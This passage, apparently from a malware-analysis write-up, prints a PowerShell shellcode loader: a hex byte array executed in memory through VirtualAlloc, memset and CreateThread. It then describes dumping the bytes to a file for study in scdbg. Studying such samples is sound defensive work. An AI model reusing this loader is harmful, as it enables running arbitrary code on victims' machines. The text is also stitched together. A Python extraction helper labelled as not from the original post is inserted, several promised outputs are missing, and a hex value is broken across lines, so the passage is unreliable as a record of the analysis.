0x00,0x6D,0x00,<#sxr#>0x00,0x00,0x00,0x00,0x00,<#jd#>0x00,0x00,0x00,0x00,0x00,<#ora#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wt#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#rea#>0x00,0x00,0x00,0x1F,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0x75,0x0C,<#pyc#>0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,0x38,0xDB,0xE2,<#gb#>0x50,0xA3,0x70,0x80,0x60,0x41,0xF7,0x49,0xB3,0x5A,0xE1,0x53,0xD1,0xBC,0xB4,0x6E,0xB0,0x74,0x98,0xB4,0xF5,0x3C,0x6C,0x81,0x3D,0x12,0xB7,<#zg#>0xE
9,0xF5,0xC2,0x34,0x23,0xA5,0x4E,0xD7,0x50,0x8D,0x7B,0x85,0xBB,0x19,0x00,0xD8,0x76,0x7F,0x09,0xB5,0xD3,0x86,0x14,0x82,<#ir#>0x44,0x59,0x5F,<#hld#>0x43,0x87,0xCB,<#wxa#>0x68,0xF6,0x32,0x8F,0x2E,0xEA,0x06,0x31,0x45,0xF0,<#oaw#>0x91,0xDA,0xDF,0x95,0x1F,0x38,<#vm#>0x5F,0xDA,0xE1,0xF4,0x1F,0x0D,0xE4,0xB7,<#frx#>0x6B,0xAB,0x3A,0x96,0xF8,0x8A,0x5A;
#wgtrs
$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
#ykcmdtyr
if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
#mmaai
for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
#tsaoik
([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
#wpzomec
}sleep(1200);}catch{}exit;
#dwkjttuue
#ysiuayivua

I next copied the contents of the $sc32 variable and pasted them into a file named sc.bin. I then cleaned up the shellcode by removing entries such as <#eg#> with the help of sed. In the end, the finished product looked like this.
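The same cleanup the author did with sed, carried a step further: strip the <#xx#> junk comments, turn the 0x.. list into sc.bin, and pull printable strings out of the bytes (the kind of registry-key hint we look for next). This is an added Python example, not code from the original post; the PowerShell snippet it parses is a constructed sample in the shape of the decoded script above, not the real shellcode.

```python
import re

# Constructed sample in the same shape as the decoded script above: a
# [Byte[]] literal with random <#xx#> block comments sprinkled in, and a
# line break falling inside one hex literal, as in the copy above.
SAMPLE_PS = r"""
#bujmhw
[Byte[]] $sc32 = 0x55,0x8B,<#eg#>0xEC,0x73,0x6F,0x66,0x74,<#ndl#>0x77,0x61,0x72,0x65,0x5C,0x65,0x6B,0x63,0x65,0x00,0xC
3,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x00;
#wgtrs
$pr=1;
"""

COMMENT_RE = re.compile(r"<#.*?#>", re.S)            # PowerShell block comment
ARRAY_RE = re.compile(r"\[Byte\[\]\]\s*\$(\w+)\s*=\s*(.*?);", re.S)


def extract_byte_array(ps_text: str, name: str = "sc32") -> bytes:
    """Return the bytes of the named [Byte[]] literal in a PowerShell script.

    Strips <#...#> comments (what the author removed with sed), rejoins hex
    literals split across a line break, then parses the 0x.. list. Raises
    ValueError if the array is absent or contains anything but byte literals.
    """
    for m in ARRAY_RE.finditer(ps_text):
        if m.group(1) != name:
            continue
        body = COMMENT_RE.sub("", m.group(2))
        body = re.sub(r"\s+", "", body)        # "0xC\n3" -> "0xC3"
        out = bytearray()
        for tok in filter(None, body.split(",")):
            if not re.fullmatch(r"0x[0-9A-Fa-f]{1,2}", tok):
                raise ValueError(f"unexpected token in ${name}: {tok!r}")
            out.append(int(tok, 16))
        return bytes(out)
    raise ValueError(f"no [Byte[]] ${name} literal found")


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs followed by UTF-16LE runs (Windows wide strings)."""
    narrow = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    wide = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    return [s.decode("ascii") for s in narrow] + [w.decode("utf-16-le") for w in wide]


def write_shellcode(ps_text: str, path: str, name: str = "sc32") -> int:
    """Write the extracted bytes to `path` (e.g. sc.bin) and return the size."""
    data = extract_byte_array(ps_text, name)
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    sc = extract_byte_array(SAMPLE_PS)
    print(len(sc), "bytes; strings:", ascii_strings(sc))
```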

At this point, we can see the shellcode interacting with the registry. However, we have no evidence of which key is being accessed. That is because the shellcode expects a parameter pointing to its own address in memory. Here is how that is supplied via scdbg.

That's it for me on this one. I met my learning goal.
